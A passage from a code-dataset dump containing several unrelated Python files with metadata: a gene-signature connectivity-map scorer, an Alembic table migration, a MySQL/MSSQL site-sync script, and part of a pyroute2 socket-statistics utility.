"serverpl.settings.MEDIA_ROOT", "line_number": 96, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 97, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 101, "usage_type": "call"}, {"api_name": "gitload.models.Loaded_Pltp", "line_number": 101, "usage_type": "argument"}]} +{"seq_id": "26532682030", "text": "import time\nfrom collections import *\nfrom joblib import Parallel, delayed\nfrom scipy.spatial import distance\n\nfrom BD_signature_parser import *\nfrom metric_calculator import *\n#from cmap import decomposition\nimport numpy as np\n#from gtf_parser import *\nfrom signature_extractor import *\nfrom new_signature_extractor import *\n\n\ndef decomposition(data):\n vector = []\n for j in range(len(data)):\n out_vector_1 = []\n out_vector_2 = []\n for gene, val in data[j].items():\n if len(val) == 2:\n out_vector_1.append(1.0)\n out_vector_2.append(1.0)\n if len(val) == 1 and val[0] == 0:\n out_vector_1.append(1.0)\n out_vector_2.append(0.0)\n if len(val) == 1 and val[0] == 1:\n out_vector_1.append(0.0)\n out_vector_2.append(1.0)\n\n vector.append(out_vector_1)\n vector.append(out_vector_2)\n return vector\n\ndef inf_score_expression(matrix, weights):\n \"\"\"\n vector = (np.array(list(matrix.loc[1])) * weights[0] + 1) * (\n np.array(list(matrix.loc[2])) * weights[1] + 1) * (\n np.array(list(matrix.loc[3])) * weights[2] + 1) * (\n np.array(list(matrix.loc[4])) * weights[3] + 1) * (\n np.array(list(matrix.loc[5])) * weights[4] + 1) * (\n np.array(list(matrix.loc[6])) * weights[5] + 1) * (\n np.array(list(matrix.loc[7])) * weights[6] + 1) * (\n np.array(list(matrix.loc[8])) * weights[7] + 1) + weights[8]\n \"\"\"\n vector = (np.array(list(matrix.loc[1])) * weights[1] + 1) * (\n np.array(list(matrix.loc[2])) * weights[2] + 1) * (\n np.array(list(matrix.loc[3])) * weights[3] + 1) * (\n np.array(list(matrix.loc[4])) * weights[4] + 1) * (\n np.array(list(matrix.loc[5])) * 
weights[5] + 1) * (\n np.array(list(matrix.loc[6])) * weights[6] + 1) * (\n np.array(list(matrix.loc[7])) * weights[7] + 1) + weights[8]\n\n return vector\n\n\nclass TopoCMap:\n\n def __init__(self, db, mode, file):\n self.up_request, self.down_request, self.up_FC, self.down_FC = new_signature_extractor(file[0], file[1])\n self.db = db\n self.mode = mode\n self.metrics_up = centrality_metrics(0.1, self.up_request, self.up_FC).metric_calculator()\n self.metrics_down = centrality_metrics(0.1, self.down_request, self.down_FC).metric_calculator()\n self.inf_score_up = None\n self.inf_score_down = None\n\n def space_finding(self, db_up, db_down):\n\n #if self.mode == \"reverse\":\n\n #set_1 = list(set(self.down_request + db_up))\n #set_2 = list(set(self.up_request + db_down))\n ## check that set_1 does not intersect set_2\n #else:\n #set_1 = list(set(self.down_request + db_down))\n #set_2 = list(set(self.up_request + db_up))\n set_1 = list(self.down_request)\n set_2 = list(self.up_request)\n set_1.extend(list(set(db_up).difference(set(self.down_request))))\n set_2.extend(list(set(db_down).difference(set(self.up_request))))\n dict_1 = defaultdict(list)\n dict_2 = defaultdict(list)\n for gene in self.down_request:\n dict_1[gene].append(0)\n\n for gene in self.up_request:\n dict_2[gene].append(0)\n\n for gene in db_up:\n dict_1[gene].append(1)\n\n for gene in db_down:\n dict_2[gene].append(1)\n ord_dict_1 = {key: dict_1[key] for key in set_1}\n ord_dict_2 = {key: dict_2[key] for key in set_2}\n return ord_dict_1, ord_dict_2\n\n def influence_score(self, weights):\n inf_scores_up = []\n inf_scores_down = []\n inf_scores_up.append(self.metrics_up.loc[0])\n \"\"\"\n for i in range(1, 7):\n print(np.std(list(self.metrics_up.loc[i])))\n \"\"\"\n inf_scores_up.append(list(inf_score_expression(self.metrics_up, weights)))\n inf_scores_down.append(self.metrics_down.loc[0])\n inf_scores_down.append(list(inf_score_expression(self.metrics_down, weights)))\n self.inf_score_up = inf_scores_up\n self.inf_score_down = inf_scores_down\n\n @staticmethod\n def current_scores(space, inf_score):\n inf_score[0] = list(inf_score[0])\n output = inf_score[1].copy()\n output.extend(np.ones(len(space) - len(inf_score[0])))\n return output\n\n def cmap(self, db_up, db_down):\n\n set_1, set_2 = self.space_finding(db_up, db_down)\n #data = [(self.up_request, set_2), (db_down, set_2), (self.down_request, set_1), (db_up, set_1)]\n #data = [(self.up_request, space), (db_down, space), (self.down_request, space), (db_up, space)]\n spaces = [set_2, set_1]\n results = decomposition(spaces)\n scores = []\n data = [self.inf_score_up, self.inf_score_down]\n for ind in range(len(spaces)):\n scores.append(self.current_scores(spaces[ind], data[ind]))\n cos1 = distance.cosine(results[2], results[3], np.nan_to_num(scores[1], nan=1.0))\n cos2 = distance.cosine(results[0], results[1], np.nan_to_num(scores[0], nan=1.0))\n cosine_dist = 0.5 * (cos1 + cos2)\n\n return cosine_dist\n\n def small_molec(self, sig_names, file_meta, file_drug, weights):\n self.influence_score(weights)\n cos_dist = []\n start = time.time()\n #space = gtf_parser()\n #scores = self.current_scores(space)\n for i in tqdm.tqdm(range(0, len(self.db), 2)):\n cos_dist.append(self.cmap(self.db[i], self.db[i+1]))\n end = time.time()\n print(end - start)\n output_data = pd.DataFrame([sig_names, cos_dist])\n metadata = pd.read_csv(file_meta)\n drugs = pd.read_csv(file_drug)\n pert_ids = []\n for sig in output_data.loc[0]:\n for ind, pert in enumerate(metadata['sig_id']):\n if sig 
== pert:\n pert_ids.append(metadata[\"pert_id\"].loc[ind])\n output_data = output_data.append(pd.Series(pert_ids), ignore_index=True)\n chems = []\n for pert in pert_ids:\n for ind, chem in enumerate(drugs['pert_id']):\n if pert == chem:\n chems.append(drugs['pubchem_cid'].loc[ind])\n output_data = output_data.append(pd.Series(chems), ignore_index=True)\n chem_name = []\n for pert in pert_ids:\n for ind, chem in enumerate(drugs['pert_id']):\n if pert == chem:\n chem_name.append(drugs['pert_iname'].loc[ind])\n output_data = output_data.append(pd.Series(chem_name), ignore_index=True)\n return output_data\n\n## normalize the coefficients and inspect the coefficient distributions for the metrics\n## Bayesian optimization\n\n", "repo_name": "marie-minaeva/Topo_CM", "sub_path": "Topo_CMap_project/Cmap.py", "file_name": "Cmap.py", "file_ext": "py", "file_size_in_byte": 7033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 117, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 131, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 131, "usage_type": "name"}, {"api_name": "numpy.nan_to_num", "line_number": 131, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 132, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 132, "usage_type": "name"}, {"api_name": "numpy.nan_to_num", "line_number": 132, "usage_type": "call"}, {"api_name": "time.time", "line_number": 140, "usage_type": "call"}, {"api_name": "time.time", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "30550038314", "text": "\"\"\"create hash images\n\nRevision ID: 5d519b033846\nRevises: 697ad27726a8\nCreate Date: 2019-08-23 15:29:55.639581\n\n\"\"\"\nimport sqlalchemy as sa\nfrom sqlalchemy.sql import func\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '5d519b033846'\ndown_revision = '697ad27726a8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'hash_images', sa.Column('id', sa.String(25), primary_key=True),\n sa.Column('digital_content_id', sa.String(25), nullable=False),\n sa.Column('hash_type', sa.String(10), nullable=False),\n sa.Column('created_at',\n sa.DateTime(timezone=True),\n nullable=False,\n server_default=func.now()),\n sa.Column('updated_at',\n sa.DateTime(timezone=True),\n nullable=False,\n server_default=func.now()),\n sa.Index(\"digital_content_id_index\", \"digital_content_id\"))\n\n\ndef downgrade():\n op.drop_table('hash_images')\n", "repo_name": "thesixnetwork/sixecho-server", "sub_path": "db/migration/versions/5d519b033846_create_hash_images.py", "file_name": "5d519b033846_create_hash_images.py", "file_ext": "py", "file_size_in_byte": 1016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, 
{"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.func.now", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.func", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.func.now", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.func", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.Index", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 37, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "9381984599", "text": "# -*- coding: utf-8 -*-\n\nimport json, time, datetime\n#from datetime import date, time, timedelta\nfrom datetime import date, timedelta\nimport pytz\n\nimport mysql.connector\n#from mysql.connector import connection\nfrom mysql.connector import errorcode\nfrom database.mysql import Mysql\nfrom database.mssql import Mssql\n\n# ao2o DB 정보 (실제 정보로 변경할 것)\nconfig_ao2o = {\n 'host': '127.0.0.1',\n 'port': '3306',\n 'user': 'user',\n 'password': 'pass',\n 'database': 'ao2o',\n 'raise_on_warnings': True,\n}\n\n# fc_master DB 정보 (실제 정보로 변경할 것)\nconfig_fc_master = {\n 'server': '127.0.0.1',\n 'port': '1433',\n 'user': 'user',\n 'password': 'pass',\n 'database': 'fc_master',\n 'charset': 'utf8',\n 'as_dict': True\n}\n\n# 현장정보 동기화 모듈\nclass SiteSync:\n def __init__(self):\n print('** 현장정보 동기화 초기화 **')\n pass\n\n def run(self):\n print('** 현장정보 동기화 실행 **')\n pass\n\n # 1. 기존 현장을 disable 시킨다.\n # 2. 동기화 시간 설정\n # 3. fc_master.areadef 의 현장 목록을 가져 온다.\n # 4. 
Register them in ao2o.areadef.\n\n cnx_mysql = Mysql(config_ao2o)\n cnx_mssql = Mssql(config_fc_master)\n\n # Disable the existing sites.\n query = \"UPDATE areadef SET enabled = 0\"\n cnx_mysql.execute(query)\n\n # Determine the sync time (converted to UTC).\n sync_utc_time = datetime.datetime.now().astimezone(pytz.utc).strftime('%Y-%m-%d %H:%M:%S')\n sync_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print(\"sync_time = \", sync_time)\n\n # Build the search query\n query = \"SELECT * FROM areadef \"\n print('query = ' + query)\n\n rows = cnx_mssql.query(query)\n cnt = 0\n for row in rows:\n cnt += 1\n if row['acLotAreaName1'] == None:\n row['acLotAreaName1'] = ''\n if row['acLotAreaName2'] == None:\n row['acLotAreaName2'] = ''\n if row['acLotAreaInfo'] == None:\n row['acLotAreaInfo'] = ''\n if row['acCompanyPlace'] == None:\n row['acCompanyPlace'] = ''\n if row['acCompanyAddress'] == None:\n row['acCompanyAddress'] = ''\n if row['acZipCode1'] == None:\n row['acZipCode1'] = ''\n if row['acZipCode2'] == None:\n row['acZipCode2'] = ''\n if row['acTelNo'] == None:\n row['acTelNo'] = ''\n\n if row['acLotAreaName1'] == '' and row['acLotAreaName2'] != '':\n row['acLotAreaName1'] = row['acLotAreaName2']\n\n # logger.info(row[0])\n # print(\"row = \", row)\n\n query = \"SELECT * FROM areadef WHERE id = {} AND iLotArea = {}\".format(row['id'], row['iLotArea'])\n print(\"query = \", query)\n areas = cnx_mysql.query(query)\n if len(areas) == 0:\n print(\"New site record\")\n query = \"\"\n query += \"INSERT INTO areadef (\"\n query += \" id\"\n query += \", iLotArea\"\n query += \", acLotAreaName1\"\n query += \", acLotAreaName2\"\n query += \", acLotAreaInfo\"\n query += \", acCompanyPlace\"\n query += \", acZipCode1\"\n query += \", acZipCode2\"\n query += \", acTelNo\"\n query += \", last_sync_time\"\n query += \", update_count\"\n query += \", enabled\"\n query += \") VALUES (\"\n query += \"{}\".format(row['id'])\n query += \", {}\".format(row['iLotArea'])\n query += \", '{}'\".format(row['acLotAreaName1'])\n query += \", '{}'\".format(row['acLotAreaName2'])\n query += \", '{}'\".format(row['acLotAreaInfo'])\n query += \", '{}'\".format(row['acCompanyPlace'])\n query += \", '{}'\".format(row['acZipCode1'])\n query += \", '{}'\".format(row['acZipCode2'])\n query += \", '{}'\".format(row['acTelNo'])\n query += \", '{}'\".format(sync_utc_time)\n query += \", {}\".format(1)\n query += \", {}\".format(1)\n query += \")\"\n else:\n print(\"Site record already registered\")\n query = \"\"\n query += \"UPDATE areadef SET\"\n query += \" acLotAreaName1 = '{}'\".format(row['acLotAreaName1'])\n query += \", acLotAreaName2 = '{}'\".format(row['acLotAreaName2'])\n query += \", acLotAreaInfo = '{}'\".format(row['acLotAreaInfo'])\n query += \", acCompanyPlace = '{}'\".format(row['acCompanyPlace'])\n query += \", acZipCode1 = '{}'\".format(row['acZipCode1'])\n query += \", acZipCode2 = '{}'\".format(row['acZipCode2'])\n query += \", acTelNo = '{}'\".format(row['acTelNo'])\n query += \", last_sync_time = '{}'\".format(sync_utc_time)\n query += \", update_count = update_count + 1\"\n query += \", enabled = 1\"\n query += \" WHERE \"\n query += \" id = {} AND iLotArea = {}\".format(row['id'], row['iLotArea'])\n print(\"query[{}] = {}\".format(cnt, query))\n cnx_mysql.execute(query)\n\n cnx_mysql.disconnect()\n cnx_mssql.disconnect()\n\n\nif __name__ == \"__main__\":\n\n exit() # NOTE: the test code below is disabled and never runs\n\n try:\n cnx = mysql.connector.connect(**config_11)\n query = 'SELECT acLotAreaName1, acLotAreaInfo FROM areadef'\n cursor = cnx.cursor()\n cursor.execute(query)\n for (acLotAreaName1, 
acLotAreaInfo) in cursor:\n print(\"{} - {}\".format(acLotAreaName1, acLotAreaInfo))\n cursor.close()\n\n for result in cnx.cmd_query_iter(query):\n if 'columns' in result:\n columns = result['columns']\n rows = cnx.get_rows()\n print(\"columns = {}\\nrows = {}\".format(columns, rows))\n else:\n print(\"Nothing data...\");\n\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\n else:\n cnx.close()\n\n", "repo_name": "somestory/ao2o_scheduler", "sub_path": "site_sync.py", "file_name": "site_sync.py", "file_ext": "py", "file_size_in_byte": 6503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "database.mysql.Mysql", "line_number": 50, "usage_type": "call"}, {"api_name": "database.mssql.Mssql", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pytz.utc", "line_number": 58, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "attribute"}, {"api_name": "mysql.connector.connector.connect", "line_number": 154, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 154, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 154, "usage_type": "name"}, {"api_name": "mysql.connector.connector", "line_number": 170, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 170, "usage_type": "name"}, {"api_name": "mysql.connector.errorcode.ER_ACCESS_DENIED_ERROR", "line_number": 171, "usage_type": "attribute"}, {"api_name": "mysql.connector.errorcode", "line_number": 171, "usage_type": "name"}, {"api_name": "mysql.connector.errorcode.ER_BAD_DB_ERROR", "line_number": 173, "usage_type": "attribute"}, {"api_name": "mysql.connector.errorcode", "line_number": 173, "usage_type": "name"}]} +{"seq_id": "9415321636", "text": "import argparse\nimport json\nimport os\nimport re\nimport socket\nfrom socket import AF_INET, AF_UNIX\n\ntry:\n import psutil\nexcept ImportError:\n psutil = None\nfrom pyroute2.netlink.diag import (\n SS_ALL,\n SS_CLOSE,\n SS_CLOSE_WAIT,\n SS_CLOSING,\n SS_CONN,\n SS_ESTABLISHED,\n SS_FIN_WAIT1,\n SS_FIN_WAIT2,\n SS_LAST_ACK,\n SS_LISTEN,\n SS_SYN_RECV,\n SS_SYN_SENT,\n SS_TIME_WAIT,\n UDIAG_SHOW_NAME,\n UDIAG_SHOW_PEER,\n UDIAG_SHOW_VFS,\n DiagSocket,\n)\n\ntry:\n from collections.abc import Callable, Mapping\nexcept ImportError:\n from collections import Callable, Mapping\n# UDIAG_SHOW_ICONS,\n# UDIAG_SHOW_RQLEN,\n# UDIAG_SHOW_MEMINFO\n\n\nclass UserCtxtMap(Mapping):\n _data = {}\n\n _sk_inode_re = re.compile(r\"socket:\\[(?P\\d+)\\]\")\n\n _proc_sk_fd_cast = \"/proc/%d/fd/%d\"\n\n _BUILD_RECURS_PATH = [\"inode\", \"usr\", \"pid\", \"fd\"]\n\n def _parse_inode(self, sconn):\n sk_path = self._proc_sk_fd_cast % (sconn.pid, sconn.fd)\n inode = None\n\n sk_inode_raw = os.readlink(sk_path)\n inode = self._sk_inode_re.search(sk_inode_raw).group(\"ino\")\n\n if not inode:\n raise RuntimeError(\"Unexpected kernel sk inode outline\")\n\n return inode\n\n def __recurs_enter(\n self,\n _sk_inode=None,\n _sk_fd=None,\n _usr=None,\n _pid=None,\n _ctxt=None,\n 
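# _recurs_path is popped in place below, so callers pass a fresh list (the [] default would be shared between calls)\n 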
_recurs_path=[],\n ):\n step = _recurs_path.pop(0)\n\n if self._BUILD_RECURS_PATH[0] == step:\n if _sk_inode not in self._data.keys():\n self._data[_sk_inode] = {}\n\n elif self._BUILD_RECURS_PATH[1] == step:\n if _usr not in self._data[_sk_inode].keys():\n self._data[_sk_inode][_usr] = {}\n\n elif self._BUILD_RECURS_PATH[2] == step:\n if _pid not in self._data[_sk_inode][_usr].keys():\n self._data[_sk_inode][_usr].__setitem__(_pid, _ctxt)\n\n elif self._BUILD_RECURS_PATH[3] == step:\n self._data[_sk_inode][_usr][_pid][\"fds\"].append(_sk_fd)\n\n # end recursion\n return\n else:\n raise RuntimeError(\"Unexpected step in recursion\")\n\n # descend\n self.__recurs_enter(\n _sk_inode=_sk_inode,\n _sk_fd=_sk_fd,\n _usr=_usr,\n _pid=_pid,\n _ctxt=_ctxt,\n _recurs_path=_recurs_path,\n )\n\n def _enter_item(self, usr, flow, ctxt):\n if not flow.pid:\n # corner case of eg anonnymous AddressFamily.AF_UNIX\n # sockets\n return\n\n sk_inode = int(self._parse_inode(flow))\n sk_fd = flow.fd\n\n recurs_path = list(self._BUILD_RECURS_PATH)\n\n self.__recurs_enter(\n _sk_inode=sk_inode,\n _sk_fd=sk_fd,\n _usr=usr,\n _pid=flow.pid,\n _ctxt=ctxt,\n _recurs_path=recurs_path,\n )\n\n def _build(self):\n for flow in psutil.net_connections(kind=\"all\"):\n try:\n proc = psutil.Process(flow.pid)\n usr = proc.username()\n\n ctxt = {\n \"cmd\": proc.exe(),\n \"full_cmd\": proc.cmdline(),\n \"fds\": [],\n }\n\n self._enter_item(usr, flow, ctxt)\n except (FileNotFoundError, AttributeError, psutil.NoSuchProcess):\n # Handling edge case of race condition between build and parse\n # time. That's for very volatile, shortlived flows that can\n # exist during build but are gone once we want to parse the\n # inode.\n pass\n\n def __init__(self):\n self._build()\n\n def __getitem__(self, key):\n return self._data[key]\n\n def __len__(self):\n return len(self._data.keys())\n\n def __delitem__(self, key):\n raise RuntimeError(\"Not implemented\")\n\n def __iter__(self):\n raise RuntimeError(\"Not implemented\")\n\n\nclass Protocol(Callable):\n class Resolver:\n @staticmethod\n def getHost(ip):\n try:\n data = socket.gethostbyaddr(ip)\n host = str(data[0])\n return host\n except Exception:\n # gracefully\n return None\n\n def __init__(self, sk_states, fmt=\"json\"):\n self._states = sk_states\n\n fmter = \"_fmt_%s\" % fmt\n self._fmt = getattr(self, fmter, None)\n\n def __call__(self, nl_diag_sk, args, usr_ctxt):\n raise RuntimeError(\"not implemented\")\n\n def _fmt_json(self, refined_stats):\n return json.dumps(refined_stats, indent=4)\n\n\nclass UNIX(Protocol):\n def __init__(self, sk_states=SS_CONN, _fmt=\"json\"):\n super(UNIX, self).__init__(sk_states, fmt=_fmt)\n\n def __call__(self, nl_diag_sk, args, usr_ctxt):\n sstats = nl_diag_sk.get_sock_stats(\n states=self._states,\n family=AF_UNIX,\n show=(UDIAG_SHOW_NAME | UDIAG_SHOW_VFS | UDIAG_SHOW_PEER),\n )\n refined_stats = self._refine_diag_raw(sstats, usr_ctxt)\n printable = self._fmt(refined_stats)\n\n print(printable)\n\n def _refine_diag_raw(self, raw_stats, usr_ctxt):\n refined = {\"UNIX\": {\"flows\": []}}\n\n def vfs_cb(raw_val):\n out = {}\n out[\"inode\"] = raw_val[\"udiag_vfs_ino\"]\n out[\"dev\"] = raw_val[\"udiag_vfs_dev\"]\n\n return out\n\n k_idx = 0\n val_idx = 1\n cb_idx = 1\n\n idiag_attr_refine_map = {\n \"UNIX_DIAG_NAME\": (\"path_name\", None),\n \"UNIX_DIAG_VFS\": (\"vfs\", vfs_cb),\n \"UNIX_DIAG_PEER\": (\"peer_inode\", None),\n \"UNIX_DIAG_SHUTDOWN\": (\"shutdown\", None),\n }\n\n for raw_flow in raw_stats:\n vessel = {}\n vessel[\"inode\"] = 
raw_flow[\"udiag_ino\"]\n\n for attr in raw_flow[\"attrs\"]:\n attr_k = attr[k_idx]\n attr_val = attr[val_idx]\n k = idiag_attr_refine_map[attr_k][k_idx]\n cb = idiag_attr_refine_map[attr_k][cb_idx]\n\n if cb:\n attr_val = cb(attr_val)\n\n vessel[k] = attr_val\n\n refined[\"UNIX\"][\"flows\"].append(vessel)\n\n if usr_ctxt:\n for flow in refined[\"UNIX\"][\"flows\"]:\n try:\n sk_inode = flow[\"inode\"]\n flow[\"usr_ctxt\"] = usr_ctxt[sk_inode]\n except KeyError:\n # might define sentinel val\n pass\n\n return refined\n\n\nclass TCP(Protocol):\n INET_DIAG_MEMINFO = 1\n INET_DIAG_INFO = 2\n INET_DIAG_VEGASINFO = 3\n INET_DIAG_CONG = 4\n\n def __init__(self, sk_states=SS_CONN, _fmt=\"json\"):\n super(TCP, self).__init__(sk_states, fmt=_fmt)\n\n IDIAG_EXT_FLAGS = [\n self.INET_DIAG_MEMINFO,\n self.INET_DIAG_INFO,\n self.INET_DIAG_VEGASINFO,\n self.INET_DIAG_CONG,\n ]\n\n self.ext_f = 0\n for f in IDIAG_EXT_FLAGS:\n self.ext_f |= 1 << (f - 1)\n\n def __call__(self, nl_diag_sk, args, usr_ctxt):\n sstats = nl_diag_sk.get_sock_stats(\n states=self._states, family=AF_INET, extensions=self.ext_f\n )\n refined_stats = self._refine_diag_raw(sstats, args.resolve, usr_ctxt)\n printable = self._fmt(refined_stats)\n\n print(printable)\n\n def _refine_diag_raw(self, raw_stats, do_resolve, usr_ctxt):\n refined = {\"TCP\": {\"flows\": []}}\n\n idiag_refine_map = {\n \"src\": \"idiag_src\",\n \"dst\": \"idiag_dst\",\n \"src_port\": \"idiag_sport\",\n \"dst_port\": \"idiag_dport\",\n \"inode\": \"idiag_inode\",\n \"iface_idx\": \"idiag_if\",\n \"retrans\": \"idiag_retrans\",\n }\n\n for raw_flow in raw_stats:\n vessel = {}\n for k1, k2 in idiag_refine_map.items():\n vessel[k1] = raw_flow[k2]\n\n for ext_bundle in raw_flow[\"attrs\"]:\n vessel = self._refine_extension(vessel, ext_bundle)\n\n refined[\"TCP\"][\"flows\"].append(vessel)\n\n if usr_ctxt:\n for flow in refined[\"TCP\"][\"flows\"]:\n try:\n sk_inode = flow[\"inode\"]\n flow[\"usr_ctxt\"] = usr_ctxt[sk_inode]\n except KeyError:\n # might define sentinel val\n pass\n\n if do_resolve:\n for flow in refined[\"TCP\"][\"flows\"]:\n src_host = Protocol.Resolver.getHost(flow[\"src\"])\n if src_host:\n flow[\"src_host\"] = src_host\n\n dst_host = Protocol.Resolver.getHost(flow[\"dst\"])\n if dst_host:\n flow[\"dst_host\"] = dst_host\n\n return refined\n\n def _refine_extension(self, vessel, raw_ext):\n k, content = raw_ext\n ext_refine_map = {\n \"meminfo\": {\n \"r\": \"idiag_rmem\",\n \"w\": \"idiag_wmem\",\n \"f\": \"idiag_fmem\",\n \"t\": \"idiag_tmem\",\n }\n }\n\n if k == \"INET_DIAG_MEMINFO\":\n mem_k = \"meminfo\"\n vessel[mem_k] = {}\n for k1, k2 in ext_refine_map[mem_k].items():\n vessel[mem_k][k1] = content[k2]\n\n elif k == \"INET_DIAG_CONG\":\n vessel[\"cong_algo\"] = content\n\n elif k == \"INET_DIAG_INFO\":\n vessel = self._refine_tcp_info(vessel, content)\n\n elif k == \"INET_DIAG_SHUTDOWN\":\n pass\n\n return vessel\n\n # interim approach\n # tcpinfo call backs\n class InfoCbCore:\n # normalizer\n @staticmethod\n def rto_n_cb(key, value, **ctx):\n out = None\n if value != 3000000:\n out = value / 1000.0\n\n return out\n\n @staticmethod\n def generic_1k_n_cb(key, value, **ctx):\n return value / 1000.0\n\n # predicates\n @staticmethod\n def snd_thresh_p_cb(key, value, **ctx):\n if value < 0xFFFF:\n return value\n\n return None\n\n @staticmethod\n def rtt_p_cb(key, value, **ctx):\n tcp_info_raw = ctx[\"raw\"]\n\n try:\n if (\n tcp_info_raw[\"tcpv_enabled\"] != 0\n and tcp_info_raw[\"tcpv_rtt\"] != 0x7FFFFFFF\n ):\n return 
tcp_info_raw[\"tcpv_rtt\"]\n except KeyError:\n # ill practice, yet except quicker path\n pass\n\n return tcp_info_raw[\"tcpi_rtt\"] / 1000.0\n\n # converter\n @staticmethod\n def state_c_cb(key, value, **ctx):\n state_str_map = {\n SS_ESTABLISHED: \"established\",\n SS_SYN_SENT: \"syn-sent\",\n SS_SYN_RECV: \"syn-recv\",\n SS_FIN_WAIT1: \"fin-wait-1\",\n SS_FIN_WAIT2: \"fin-wait-2\",\n SS_TIME_WAIT: \"time-wait\",\n SS_CLOSE: \"unconnected\",\n SS_CLOSE_WAIT: \"close-wait\",\n SS_LAST_ACK: \"last-ack\",\n SS_LISTEN: \"listening\",\n SS_CLOSING: \"closing\",\n }\n\n return state_str_map[value]\n\n @staticmethod\n def opts_c_cb(key, value, **ctx):\n tcp_info_raw = ctx[\"raw\"]\n\n # tcp_info opt flags\n TCPI_OPT_TIMESTAMPS = 1\n TCPI_OPT_SACK = 2\n TCPI_OPT_ECN = 8\n\n out = []\n\n opts = tcp_info_raw[\"tcpi_options\"]\n if opts & TCPI_OPT_TIMESTAMPS:\n out.append(\"ts\")\n if opts & TCPI_OPT_SACK:\n out.append(\"sack\")\n if opts & TCPI_OPT_ECN:\n out.append(\"ecn\")\n\n return out\n\n def _refine_tcp_info(self, vessel, tcp_info_raw):\n ti = TCP.InfoCbCore\n\n info_refine_tabl = {\n \"tcpi_state\": (\"state\", ti.state_c_cb),\n \"tcpi_pmtu\": (\"pmtu\", None),\n \"tcpi_retrans\": (\"retrans\", None),\n \"tcpi_ato\": (\"ato\", ti.generic_1k_n_cb),\n \"tcpi_rto\": (\"rto\", ti.rto_n_cb),\n # TODO consider wscale baking\n \"tcpi_snd_wscale\": (\"snd_wscale\", None),\n \"tcpi_rcv_wscale\": (\"rcv_wscale\", None),\n # TODO bps baking\n \"tcpi_snd_mss\": (\"snd_mss\", None),\n \"tcpi_snd_cwnd\": (\"snd_cwnd\", None),\n \"tcpi_snd_ssthresh\": (\"snd_ssthresh\", ti.snd_thresh_p_cb),\n # TODO consider rtt agglomeration - needs nesting\n \"tcpi_rtt\": (\"rtt\", ti.rtt_p_cb),\n \"tcpi_rttvar\": (\"rttvar\", ti.generic_1k_n_cb),\n \"tcpi_rcv_rtt\": (\"rcv_rtt\", ti.generic_1k_n_cb),\n \"tcpi_rcv_space\": (\"rcv_space\", None),\n \"tcpi_options\": (\"opts\", ti.opts_c_cb),\n # unclear, NB not in use by iproute2 ss latest\n \"tcpi_last_data_sent\": (\"last_data_sent\", None),\n \"tcpi_rcv_ssthresh\": (\"rcv_ssthresh\", None),\n \"tcpi_rcv_ssthresh\": (\"rcv_ssthresh\", None),\n \"tcpi_segs_in\": (\"segs_in\", None),\n \"tcpi_segs_out\": (\"segs_out\", None),\n \"tcpi_data_segs_in\": (\"data_segs_in\", None),\n \"tcpi_data_segs_out\": (\"data_segs_out\", None),\n \"tcpi_lost\": (\"lost\", 